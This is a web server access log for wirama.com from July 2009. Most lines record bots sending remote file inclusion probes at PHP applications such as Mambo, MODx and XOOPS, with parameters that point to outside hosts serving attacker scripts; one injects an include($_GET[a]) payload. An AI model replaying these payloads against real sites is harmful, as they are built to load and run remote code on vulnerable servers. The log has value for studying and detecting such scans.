213.195.69.64 - - [31/Jul/2009:09:34:49 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://indo.home.ro/testv??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
128.121.51.87 - - [31/Jul/2009:09:40:50 -0700] "GET /index.php/?mosConfig_absolute_path=http://bebe.com.br/album/imagens/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
128.121.51.87 - - [31/Jul/2009:09:40:54 -0700] "GET /logs/access_090531.log%20%20//index.php/?mosConfig_absolute_path=http://bebe.com.br/album/imagens/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
128.121.51.87 - - [31/Jul/2009:09:40:54 -0700] "GET /logs//index.php/?mosConfig_absolute_path=http://bebe.com.br/album/imagens/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
128.121.51.87 - - [31/Jul/2009:09:42:27 -0700] "GET /logs/access_090501.log%20%20//index.php/?mosConfig_absolute_path=http://bebe.com.br/album/imagens/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:09:43:15 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:09:43:15 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.wirama.com"
128.121.51.87 - - [31/Jul/2009:09:46:55 -0700] "GET /index.php/?mosConfig_absolute_path=http://bebe.com.br/album/imagens/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
128.121.51.87 - - [31/Jul/2009:09:46:55 -0700] "GET /logs/access_090401.log//index.php/?mosConfig_absolute_path=http://bebe.com.br/album/imagens/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
128.121.51.87 - - [31/Jul/2009:09:46:55 -0700] "GET /logs//index.php/?mosConfig_absolute_path=http://bebe.com.br/album/imagens/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
128.121.51.87 - - [31/Jul/2009:09:50:18 -0700] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bebe.com.br/album/imagens/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
128.121.51.87 - - [31/Jul/2009:09:50:18 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bebe.com.br/album/imagens/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
128.121.51.87 - - [31/Jul/2009:09:50:18 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bebe.com.br/album/imagens/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
128.121.51.87 - - [31/Jul/2009:09:51:10 -0700] "GET /logs/access_090401.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bebe.com.br/album/imagens/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [31/Jul/2009:09:52:39 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:09:53:57 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:09:53:57 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.wirama.com"
222.236.47.192 - - [31/Jul/2009:09:57:56 -0700] "GET /skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.192 - - [31/Jul/2009:09:57:56 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.192 - - [31/Jul/2009:09:57:56 -0700] "GET /logs/access_090531.log/skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
99.173.30.78 - - [31/Jul/2009:09:59:17 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19" "wirama.com"
99.173.30.78 - - [31/Jul/2009:09:59:18 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://wirama.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19" "wirama.com"
88.199.57.35 - - [31/Jul/2009:10:04:18 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:10:04:19 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
213.171.225.234 - - [31/Jul/2009:10:04:32 -0700] "GET /logs/access_090501.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
213.171.225.234 - - [31/Jul/2009:10:04:32 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
213.171.225.234 - - [31/Jul/2009:10:04:33 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
222.236.47.192 - - [31/Jul/2009:10:05:02 -0700] "GET /skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.192 - - [31/Jul/2009:10:05:02 -0700] "GET /logs/access_090531.log/skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.192 - - [31/Jul/2009:10:05:02 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.192 - - [31/Jul/2009:10:05:20 -0700] "GET /logs/access_090531.log%20%20/skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.192 - - [31/Jul/2009:10:06:01 -0700] "GET /logs/access_090501.log%20%20/skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.171.225.234 - - [31/Jul/2009:10:06:13 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.55.106.170 - - [31/Jul/2009:10:11:28 -0700] "GET /jo02.htm HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
222.236.47.192 - - [31/Jul/2009:10:12:36 -0700] "GET /logs/access_090531.log%20%20/skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.192 - - [31/Jul/2009:10:12:54 -0700] "GET /logs/access_090501.log%20%20/skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:10:14:31 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:10:14:31 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.wirama.com"
222.236.47.192 - - [31/Jul/2009:10:21:53 -0700] "GET /logs/access_090601.log/skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.192 - - [31/Jul/2009:10:21:53 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.192 - - [31/Jul/2009:10:21:53 -0700] "GET /skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.199.57.35 - - [31/Jul/2009:10:24:57 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:10:24:57 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:10:35:13 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:10:35:14 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:10:45:55 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:10:45:55 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.wirama.com"
218.246.20.221 - - [31/Jul/2009:10:50:14 -0700] "GET /appserv/main.php?appserv_root=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.246.20.221 - - [31/Jul/2009:10:50:14 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.246.20.221 - - [31/Jul/2009:10:50:14 -0700] "GET /logs/access_090701.log%20%20//appserv/main.php?appserv_root=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.204 - - [31/Jul/2009:10:51:58 -0700] "GET /logs/access_090531.log HTTP/1.1" 200 65536 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
88.199.57.35 - - [31/Jul/2009:10:56:48 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:10:56:48 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:11:07:12 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:11:07:12 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:11:17:45 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:11:17:46 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.wirama.com"
78.14.4.61 - - [31/Jul/2009:11:18:51 -0700] "GET /ppa/inc/functions.inc.php?config[ppa_root_path]=http://webco.cco.cl:123/php/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
78.14.4.61 - - [31/Jul/2009:11:18:54 -0700] "GET /logs/access.log%20%20//ppa/inc/functions.inc.php?config[ppa_root_path]=http://webco.cco.cl:123/php/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
78.14.4.61 - - [31/Jul/2009:11:20:40 -0700] "GET /logs/access.log//ppa/inc/functions.inc.php?config[ppa_root_path]=http://webco.cco.cl:123/php/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
71.202.105.64 - - [31/Jul/2009:11:22:43 -0700] "GET / HTTP/1.1" 200 916 "http://www.linkedin.com/profile?viewProfile=&key=9745225&trk=EML_nus_dig_jgrpg-A26" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)" "www.wirama.com"
71.202.105.64 - - [31/Jul/2009:11:22:43 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)" "www.wirama.com"
71.202.105.64 - - [31/Jul/2009:11:22:45 -0700] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)" "www.wirama.com"
71.202.105.64 - - [31/Jul/2009:11:22:46 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)" "www.wirama.com"
71.202.105.64 - - [31/Jul/2009:11:22:46 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)" "www.wirama.com"
71.202.105.64 - - [31/Jul/2009:11:22:47 -0700] "GET /_private/form_results.csv HTTP/1.1" 200 0 "http://www.wirama.com/_private/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:11:28:29 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:11:28:29 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:11:39:09 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:11:39:09 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:11:49:52 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:11:49:52 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
66.206.120.2 - - [31/Jul/2009:11:49:56 -0700] "HEAD / HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.wirama.com"
66.206.120.2 - - [31/Jul/2009:11:49:56 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:12:00:44 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:12:00:44 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.wirama.com"
65.55.106.164 - - [31/Jul/2009:12:08:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
88.199.57.35 - - [31/Jul/2009:12:11:00 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:12:11:00 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:12:21:50 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:12:21:50 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.wirama.com"
203.236.100.30 - - [31/Jul/2009:12:27:58 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
203.236.100.30 - - [31/Jul/2009:12:27:58 -0700] "GET /logs/access_090301.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
203.236.100.30 - - [31/Jul/2009:12:27:58 -0700] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
117.110.74.195 - - [31/Jul/2009:12:30:48 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
117.110.74.195 - - [31/Jul/2009:12:30:48 -0700] "GET /logs/access_090301.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
117.110.74.195 - - [31/Jul/2009:12:30:48 -0700] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
117.110.74.195 - - [31/Jul/2009:12:31:14 -0700] "GET /logs/access_090301.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
117.110.74.195 - - [31/Jul/2009:12:31:15 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
117.110.74.195 - - [31/Jul/2009:12:31:15 -0700] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.199.57.35 - - [31/Jul/2009:12:32:26 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:12:32:26 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:12:43:00 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:12:43:00 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
65.55.106.164 - - [31/Jul/2009:12:49:05 -0700] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
88.199.57.35 - - [31/Jul/2009:12:53:37 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:12:53:37 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.wirama.com"
117.110.74.195 - - [31/Jul/2009:12:54:15 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
117.110.74.195 - - [31/Jul/2009:12:54:15 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
117.110.74.195 - - [31/Jul/2009:12:54:15 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
117.110.74.195 - - [31/Jul/2009:12:54:35 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
117.110.74.195 - - [31/Jul/2009:12:54:35 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
117.110.74.195 - - [31/Jul/2009:12:54:35 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
117.110.74.195 - - [31/Jul/2009:12:58:06 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
117.110.74.195 - - [31/Jul/2009:12:58:06 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
117.110.74.195 - - [31/Jul/2009:12:58:06 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:13:04:24 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:13:04:24 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:13:14:51 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.wirama.com"
